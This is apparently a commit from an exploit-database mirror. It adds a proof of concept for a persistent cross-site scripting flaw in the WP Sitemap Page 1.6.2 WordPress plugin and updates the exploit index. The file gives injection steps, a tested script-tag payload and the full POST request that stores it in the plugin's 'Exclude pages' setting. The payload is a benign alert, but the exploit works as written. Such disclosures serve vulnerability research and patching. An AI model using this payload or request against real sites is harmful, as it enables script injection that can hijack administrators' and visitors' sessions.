DB: 2020-02-19
1 changes to exploits/shellcodes WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
This commit is contained in:
parent
228a37da9c
commit
e28fa0b839
2 changed files with 33 additions and 1 deletions
31
exploits/php/webapps/48093.txt
Normal file
31
exploits/php/webapps/48093.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
|
||||
# Dork:N/A
|
||||
# Date: 2020-02-17
|
||||
# Exploit Author: UltraSecurityTeam
|
||||
# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
|
||||
# Vendor Homepage: UltraSec.Org
|
||||
# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
|
||||
# Tested on: Windows/Linux
|
||||
# Version: 1.6.2
|
||||
|
||||
|
||||
|
||||
.:: Plugin Description ::.
|
||||
An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts
|
||||
|
||||
|
||||
.:: Proof Of Concept (PoC) ::.
|
||||
|
||||
Step 1 - Open WordPress Setting
|
||||
Step 2 - Open Wp Sitemap Page
|
||||
Step 3 - Inject Your Java Script Codes to Exclude pages
|
||||
Step 4 - Click Button Save Changes
|
||||
Step 5 - Run Your Payload
|
||||
|
||||
|
||||
.:: Tested Payload ::.
|
||||
'>"><script>alert(/XSS By UltraSecurity/)</script>
|
||||
|
||||
|
||||
.:: Post Request ::.
|
||||
option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes
|
|
@ -42369,7 +42369,8 @@ id,file,description,date,author,type,platform,port
|
|||
48076,exploits/php/webapps/48076.txt,"Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php,
|
||||
48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware,
|
||||
48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
|
||||
48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ashkan Moghaddas",webapps,php,
|
||||
48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ultra Security Team",webapps,php,
|
||||
48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
|
||||
48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
|
||||
48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,
|
||||
48093,exploits/php/webapps/48093.txt,"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting",2020-02-18,"Ultra Security Team",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue